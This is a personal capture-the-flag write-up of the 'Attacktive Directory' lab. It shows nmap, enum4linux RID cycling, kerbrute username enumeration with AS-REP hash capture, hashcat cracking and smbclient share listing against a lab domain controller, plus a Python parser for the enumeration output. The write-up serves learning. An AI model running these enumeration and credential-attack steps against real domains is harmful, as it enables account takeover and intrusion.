Attacktive Directory

Alright, this seems like a good next step in my journey. I know AD is used everywhere; I've even used it myself a few times for OIDC auth in front of cloud applications. But I've never interfaced with it directly, and I know this is something I'll need to know how to do, so let's get to it!

Installing Impacket

$ git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
Cloning into '/opt/impacket'...
remote: Enumerating objects: 36, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 18881 (delta 14), reused 21 (delta 7), pack-reused 18845
Receiving objects: 100% (18881/18881), 6.26 MiB | 12.57 MiB/s, done.
Resolving deltas: 100% (14364/14364), done.

$ pip3 install -r /opt/impacket/requirements.txt
Ignoring pyreadline: markers 'sys_platform == "win32"' don't match your environment
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 2)) (1.15.0)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 3)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 4)) (3.9.7)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 5)) (20.0.1)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 6)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 7)) (0.9.3)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 8)) (1.1.2)

$ cd /opt/impacket/ && python3 ./setup.py install
... Installs ...

Enumerate the DC Pt. 1

Alright, I do know what DC is: Domain Controller. At least I have that going for me!

Well, it asks me to use a popular enumeration tool to reveal some information… To start, I'm just going to nmap this and see what's going on there:

# sudo nmap -n -Pn -p- --script vuln 10.10.203.98
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-03 10:50 EST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:13:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:04 (0:00:00 remaining)
Stats: 0:15:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:06 (0:00:00 remaining)
Stats: 0:16:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:06 (0:00:00 remaining)
Nmap scan report for 10.10.203.98
Host is up (0.12s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
|_sslv2-drown: 
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_sslv2-drown: 
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_sslv2-drown: 
3389/tcp  open  ms-wbt-server
|_sslv2-drown: 
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49669/tcp open  unknown
49673/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49679/tcp open  unknown
49684/tcp open  unknown
49696/tcp open  unknown
49814/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 981.94 seconds

A quick search for how to enumerate Windows AD turns up enum4linux as the first result, which is the correct first answer.

Alright, I guess we should run that against the host then!

$ sudo enum4linux 10.10.203.98                                                                                                                                              255 ⨯
[sudo] password for kali: 
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar  3 10:52:23 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.203.98
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.203.98    |
 ==================================================== 
[E] Can't find workgroup/domain


 ============================================ 
|    Nbtstat Information for 10.10.203.98    |
 ============================================ 
Looking up status of 10.10.203.98
No reply from 10.10.203.98

 ===================================== 
|    Session Check on 10.10.203.98    |
 ===================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.203.98 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.203.98    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.203.98    |
 ====================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.203.98 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.203.98 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.203.98    |
 ============================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ========================================= 
|    Share Enumeration on 10.10.203.98    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.203.98

 ==================================================== 
|    Password Policy Information for 10.10.203.98    |
 ==================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.10.203.98 using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.10.203.98)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[E] Failed to get password policy with rpcclient


 ============================== 
|    Groups on 10.10.203.98    |
 ============================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.203.98 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[I] Found new SID: S-1-5-21-3591857110-2884097990-301047963
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.

S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.


 ============================================= 
|    Getting printer info for 10.10.203.98    |
 ============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Wed Mar  3 10:56:54 2021

Alright, so most of the answers in this section were obvious from the default output; however, I don't know why a top-level domain could cause issues…
samba.org:

In this scenario you would name your domain in the format of "domain.invalid.tld" such as "SAMDOM.local". Using an invalid top-level domain (TLD) such as .local or .internal used to be a very common practice. In fact all versions of Microsoft's Small Business Servers were configured to use a domain in the form of "domain.local". Since the .local TLD is officially reserved by ICANN, you can also be assured that no external DNS server will resolve this domain. However this style of name has a few major issues:

    The .local TLD is used by some zeroconf systems, most importantly Apple's Bonjour service. Using them together will not work correctly.

    Invalid TLDs, such as .local or .internal, will soon be unable to get SSL certificates from any of the major certificate providers. The CA/Browser Forum has decided that no certificates should be issued for these invalid domains starting November 1, 2015. In fact, you are now unable to purchase a certificate for these names if they expire after this date. This includes Subject Alternative Names (SAN) used within otherwise valid certificates (this is a very common configuration for Microsoft Exchange). While internal certificate authorities have no such restriction, having this option open to you is always a good thing.

    It is possible that the invalid TLD you are now using, could become a valid TLD in the future. While .local is reserved by ICANN, the TLD system is currently scheduled to undergo a vast expansion of the generic TLD (gTLD) it supports, from 22 to over a thousand new names. This trend is likely to continue.

For the same reason, names with other invalid TLDs should be avoided, including .internal and .lan

.local was the answer!
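The RID-cycling block is the part of that enum4linux output worth reading closely, so here is an added example (not part of the original write-up, and not enum4linux code) that parses those lines and pulls out what an attacker actually cares about: which S-1-5-21 SID is the real domain (the one that owns krbtgt at RID 502), which well-known privileged RIDs resolved, which accounts are machine accounts (trailing `$`), and which RIDs are above 1000 and therefore not built-in. The sample input is a handful of lines copied from the output above; the well-known-RID table is Microsoft's documented values. `NETBIOS_MAX` and the heuristic that a 15-character machine name was probably truncated are my assumptions.

```python
import re
from collections import defaultdict

# Sample input: lines copied from the enum4linux RID-cycling output above.
SAMPLE_OUTPUT = r"""
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\*unknown* (8)
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
"""

# <identifier authority>-<rid> <AUTHORITY>\<name> (<kind>)
LINE_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)\s+(\S+)\\(.+?)\s+\((.+)\)$")

# Well-known RIDs an attacker cares about (documented Windows values).
PRIVILEGED_RIDS = {
    500: "Administrator", 502: "krbtgt", 512: "Domain Admins", 516: "Domain Controllers",
    518: "Schema Admins", 519: "Enterprise Admins", 520: "Group Policy Creator Owners",
    526: "Key Admins", 527: "Enterprise Key Admins",
}
NETBIOS_MAX = 15  # NetBIOS names are capped at 15 characters (assumed heuristic below)


def parse_rid_cycling(text):
    """Turn enum4linux RID-cycling lines into dicts; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            sid, rid, authority, name, kind = m.groups()
            entries.append({"sid": sid, "rid": int(rid), "authority": authority,
                            "name": name, "kind": kind})
    return entries


def summarize(entries):
    """Group by SID and report what each identifier authority reveals."""
    by_sid = defaultdict(list)
    for e in entries:
        by_sid[e["sid"]].append(e)
    report = {}
    for sid, items in by_sid.items():
        names = {e["rid"]: e["name"] for e in items}
        authorities = {e["authority"] for e in items} - {"*unknown*"}
        report[sid] = {
            "authority": sorted(authorities),
            # Only an AD domain has the krbtgt account, always at RID 502.
            "is_domain": names.get(502) == "krbtgt",
            "privileged": sorted(e["name"] for e in items if e["rid"] in PRIVILEGED_RIDS),
            "machine_accounts": sorted(e["name"] for e in items if e["name"].endswith("$")),
            # A machine name of exactly 15 chars was very likely cut at the NetBIOS limit.
            "possibly_truncated_hosts": sorted(
                e["name"] for e in items
                if e["name"].endswith("$") and len(e["name"]) - 1 == NETBIOS_MAX),
            # RIDs >= 1000 are not built-in: custom users, groups and computers live here.
            "non_builtin_rids": sorted(e["rid"] for e in items if e["rid"] >= 1000),
        }
    return report


def domain_sids(report):
    """SIDs that are AD domains (krbtgt present), usually exactly one on a DC."""
    return sorted(sid for sid, r in report.items() if r["is_domain"])


if __name__ == "__main__":
    rep = summarize(parse_rid_cycling(SAMPLE_OUTPUT))
    for sid, r in rep.items():
        print(sid, "domain" if r["is_domain"] else "not a domain", r)
```

Two things the summary makes obvious that the raw dump hides: only one of the two S-1-5-21 SIDs owns krbtgt, so only that one is the domain SID to put in any later SID-based tooling; and the single RID above 1000 is the DC's own machine account. enum4linux's default range (500-550, 1000-1050) stops there, so on a real domain you widen it with `-R` to find the user and group RIDs that live higher up.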

Enumerate the DC Pt. 2

We’re being instructed to use kerbrute to brute-force with a given username/password list. I guess this one is for learning purposes, but this is pretty lame in my opinion. A pruned username/password list?! Sigh…

Install kerbrute

┌──(kali㉿kali)-[~/scripts]
└─$ go get github.com/ropnop/kerbrute                                                                                                                                         100 ⨯
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/scripts]
└─$ make all  
make: *** No rule to make target 'all'.  Stop.
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/scripts]
└─$ kerbrute                                                                                                                                                                    2 ⨯
zsh: command not found: kerbrute
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/scripts]
└─$ cd $GOPATH                                                                                                                                                                127 ⨯
                                                                                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ ls
config  Desktop  Documents  Downloads  go  Music  peda  Pictures  Public  result.txt  scripts  Templates  test.sh  tmp  t.sh  Videos  vpn  x.sh
                                                                                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ cd go     
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go]
└─$ cd src    
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src]
└─$ ls
github.com  golang.org
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src]
└─$ cd github.com 
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src/github.com]
└─$ ls
hashicorp  jcmturner  op  ropnop  spf13
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src/github.com]
└─$ cd ropnop    
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src/github.com/ropnop]
└─$ ls
gokrb5  kerbrute
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src/github.com/ropnop]
└─$ cd kerbrute 
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ mnake all
zsh: command not found: mnake
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ make all                                                                                                                                                                  127 ⨯
go: downloading github.com/op/go-logging v0.0.0-20160315200505-970db520ece7
go: downloading github.com/ropnop/gokrb5/v8 v8.0.0-20201111231119-729746023c02
go: downloading github.com/spf13/cobra v1.1.1
go: downloading github.com/spf13/pflag v1.0.5
go: downloading github.com/jcmturner/gofork v1.0.0
go: downloading github.com/jcmturner/dnsutils/v2 v2.0.0
go: downloading golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897
go: downloading github.com/jcmturner/rpc/v2 v2.0.2
go: downloading github.com/jcmturner/aescts/v2 v2.0.0
go: downloading github.com/hashicorp/go-uuid v1.0.2
go: downloading golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa
cd /home/kali/go/src/github.com/ropnop/kerbrute
rm -f kerbrute kerbrute.exe kerbrute.test kerbrute.test.exe main main.exe
rm -f /home/kali/go/bin/kerbrute
Done.
Building for windows amd64..
go: downloading github.com/inconshreveable/mousetrap v1.0.0
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
cmd/go: unsupported GOOS/GOARCH pair darwin/386
make: *** [Makefile:42: mac] Error 1
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ kernbrute                                                                                                                                                                   2 ⨯
zsh: command not found: kernbrute
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ kerbrute                                                                                                                                                                  127 ⨯
zsh: command not found: kerbrute
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ ls                                                                                                                                                                        127 ⨯
cmd  dist  go.mod  go.sum  LICENSE  main.go  Makefile  README.md  session  util
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ cd dist    
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ls
kerbrute_darwin_amd64  kerbrute_linux_386  kerbrute_linux_amd64  kerbrute_windows_386.exe  kerbrute_windows_amd64.exe
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ kernel-install 
Not enough arguments
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ls -al                                                                                                                                                                      1 ⨯
total 37300
drwxr-xr-x 2 kali kali    4096 Mar  3 11:37 .
drwxr-xr-x 8 kali kali    4096 Mar  3 11:37 ..
-rwxr-xr-x 1 kali kali 7988312 Mar  3 11:37 kerbrute_darwin_amd64
-rwxr-xr-x 1 kali kali 7018814 Mar  3 11:37 kerbrute_linux_386
-rwxr-xr-x 1 kali kali 8153622 Mar  3 11:37 kerbrute_linux_amd64
-rwxr-xr-x 1 kali kali 7028736 Mar  3 11:37 kerbrute_windows_386.exe
-rwxr-xr-x 1 kali kali 7991296 Mar  3 11:37 kerbrute_windows_amd64.exe
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ./kerbrute_linux_amd64 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 03/03/21 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string          The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int          Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string      The full domain to use (e.g. contoso.com)
      --downgrade          Force downgraded encryption type (arcfour-hmac-md5)
      --hash-file string   File to save AS-REP hashes to (if any captured), otherwise just logged
  -h, --help               help for kerbrute
  -o, --output string      File to write logs to. Optional.
      --safe               Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int        Threads to use (default 10)
  -v, --verbose            Log failures and errors

Use "kerbrute [command] --help" for more information about a command.
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ mv ./kerbrute_linux_amd64 /usr/bin/kerbrute
mv: cannot move './kerbrute_linux_amd64' to '/usr/bin/kerbrute': Permission denied
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ sudo !!                                                                                                                                                                     1 ⨯
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ sudo mv ./kerbrute_linux_amd64 /usr/bin/kerbrute                                                                                                                            1 ⨯
[sudo] password for kali:
$ cd ~ && which kerbrute
/usr/bin/kerbrute

Download the wordlists

$ cd ~ && mkdir tmp && cd tmp
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

$ ls -al
total 1292
drwxr-xr-x  2 kali kali   4096 Mar  3 11:40 .
drwxr-xr-x 30 kali kali   4096 Mar  3 11:39 ..
-rw-r--r--  1 kali kali 569236 Mar  3 11:40 passwordlist.txt
-rw-r--r--  1 kali kali 744407 Mar  3 11:40 userlist.txt

$ kerbrute userenum --dc 10.10.203.98 -d THM-AD  ./userlist.txt                                                                                                               1 ⨯

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 03/03/21 - Ronnie Flathers @ropnop

2021/03/03 11:43:03 >  Using KDC(s):
2021/03/03 11:43:03 >  	10.10.203.98:88

2021/03/03 11:43:03 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:05 >  [+] svc-admin has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$svc-admin@THM-AD:4715c0c49c0041ef374f45ed323315fd$…
2021/03/03 11:43:05 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:07 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:08 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:16 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:22 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:33 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:38 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:44:10 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:44:21 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:45:23 >  [+] VALID USERNAME:	 [email protected]

Alright, time to crack that hash. I switched over to my Windows host, which can use my GPU:

C:\Users\matth\Desktop\Security\cracking\hashcat-6.1.1\hashcat-6.1.1>hashcat.exe -m 18200 -a 0 -o result.txt ..\..\hashes\1.txt  ..\..\wordlist\1.txt
hashcat (v6.1.1) starting...

* Device #1: CUDA SDK Toolkit installation NOT detected.
             CUDA SDK Toolkit installation required for proper device support and utilization
             Falling back to OpenCL Runtime

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 1.2 CUDA 11.2.109) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: GeForce RTX 2080 Ti, 9664/11264 MB (2816 MB allocatable), 68MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1169 MB

Dictionary cache built:
* Filename..: ..\..\wordlist\1.txt
* Passwords.: 70188
* Bytes.....: 639424
* Keyspace..: 70188
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23[email protected]:4715c0c49c0...c25199
Time.Started.....: Wed Mar 03 12:08:15 2021 (1 sec)
Time.Estimated...: Wed Mar 03 12:08:16 2021 (0 secs)
Guess.Base.......: File (..\..\wordlist\1.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 56258.4 kH/s (0.38ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 70188/70188 (100.00%)
Rejected.........: 0/70188 (0.00%)
Restore.Point....: 70188/70188 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> pinkk
Hardware.Mon.#1..: Temp: 36c Fan:  0% Util: 48% Core:1965MHz Mem:6800MHz Bus:16

Started: Wed Mar 03 12:08:14 2021
Stopped: Wed Mar 03 12:08:16 2021

Enumerate DC Pt. 3

Now we’re told to enumerate SMB shares with our known account…

We’re going to use smbclient to poke around real quick:

# List shares
$ smbclient -U svc-admin -L ///10.10.204.111
Enter WORKGROUP\svc-admin's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backup          Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
# Poke at shares
┌──(kali㉿kali)-[~/tmp]
└─$ smbclient \\\\10.10.204.111\\ADMIN -U svc-admin
